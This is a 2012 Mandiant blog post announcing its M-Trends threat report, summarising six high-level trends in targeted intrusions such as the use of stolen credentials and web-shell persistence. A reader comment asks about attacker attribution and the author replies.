M-unition -

M-Trends: The One Threat Report You Need to Read

By on March 6, 2012

Today is a big day. If you’ve followed us for a while you know that once a year we step back and take stock of what we’ve seen on the front lines battling targeted attacks. What is the advanced persistent threat (APT) up to? How are organized crime groups changing their tactics? What can organizations do to respond? Hot off the presses, M-Trends 2012, is full of facts, figures, case studies and recommendations. You can download the full report here. And we’ve got a webinar on March 16th to go over the report in detail.

While writing M-Trends 2012 a couple of interesting facts that jumped out at us were 94% and 416. The first number is the percent of companies that learn they are a victim of a targeted attack from an external party such as law enforcement. The second is the median number of days the average advanced attacker has before they are detected.

All in all, the Mandiant team identified six key trends this year based on the hundreds of advanced threat investigations we have conducted.

  1. Compromised Organizations Are Increasingly Detected During the M&A Cycle: Based on Mandiant’s experience, a record number of targeted intrusions were discovered while the victimized organizations were in the process of integrating into their new parent organizations.
  2. Advanced Attackers Are Targeting Multiple Companies across a Supply Chain: Attackers are targeting companies that collaborate together within a supply chain in order to assemble a comprehensive intellectual property portfolio.
  3. Malware Only Tells Half the Story: Only 54% of compromised machines that Mandiant investigated contained malware while 100% of the attacks Mandiant investigated utilized stolen credentials during the intrusion.
  4. Attackers Are Diversifying Their Persistence Mechanisms: During 2011, Mandiant saw advanced attackers diversify their backdoor mechanisms to include passive backdoors such as port listeners and web shells that are more resilient against detection and remediation efforts.
  5. The Use of Publicly Available Tools Is Adding Complexity to Identifying Threat Actors: Over the past year, Mandiant has seen an increase in attack groups using publicly available Remote Access Trojans (RATs), backdoors, and utilities to gain access into victim organizations. This use of RATs has added complexity to identifying threat actors.
  6. Financially Motivated Attackers Are Increasingly Persistent: Organized crime groups are adopting persistence mechanisms previously used by nation-state threat actors.

If you stopped by our booth at RSA you were lucky enough to get an advance copy of M-Trends 2012. For those that missed it you can now download the full report here. Grady Summers, vice president at Mandiant and one of the principal authors will be breaking down each trend in depth over the coming weeks so stay tuned for his future blog posts.

Once you’ve had a chance to read the report, I’d love to hear your comments. Please include them below.

Category: The Armory

Comments

    1. By saad on March 12 at 11:13 am

      Thank you for such a great, eye-opening report. It’s packed with invaluable content for incident responders and security managers/upper management alike.

      Unless I’ve missed something, there’s no analysis of the attacker themselves. While you distinguish between the APT and the financially motivated ones, were there any incidents where two or more attacker groups acted/maintained presence?

      For example, in the electronics manufacturer case study on pages 16-17, you mention that the intruder installed malware on less than half of the approx. 100 compromised systems. The reader shall assume then there was only one intruder (individual or group). But is there any chance there were several with the same or different motives?

      I hope you will clarify this point during the March 16 webinar.

      On a side note, Mr. Bejtlich voiced his concern on a few occasions about China’s aggressiveness and role in the IP bleeding of US corporations. But the country of origin (or geodistribution of the attacker groups) is never mentioned, save on page 24 where you speak briefly about Russian organized crime groups.

      Also, I’ve been wishing to see how the October 11 SEC guidance may have influenced IR, during the M&A process for example. But I guess it’s too early to say.

      Thank you again for sharing such an important resource for our community and I am looking forward for the March 16 webinar.

      Best Regards,
      Saad Kadhi, Hapsis, FRANCE.

    2. By Helena Brito (Author) on March 13 at 4:09 pm

      Thank you for your comments and questions. Richard Bejtlich will address your points in an upcoming stand-alone blog post.

    3. By Helena Brito (Author) on April 2 at 10:09 am

      Richard has written a blog post answering the questions you had: https://blog.mandiant.com/archives/2390

    Leave a Comment

Get M-Unition in Your Inbox:

Follow @mandiant

Follow @mandiant on twitter.

Career Opps @ Mandiant

We’re growing fast, but we’re as demanding as ever. Our clients come to us in their hours of need, so we need the best. That means more than just the right education and the right experience in information security.

As Mandiant continues to grow, we are able to offer certain positions in multiple locations. For details on the location(s) of each opening, please refer to the position descriptions.

Click here to view available positions.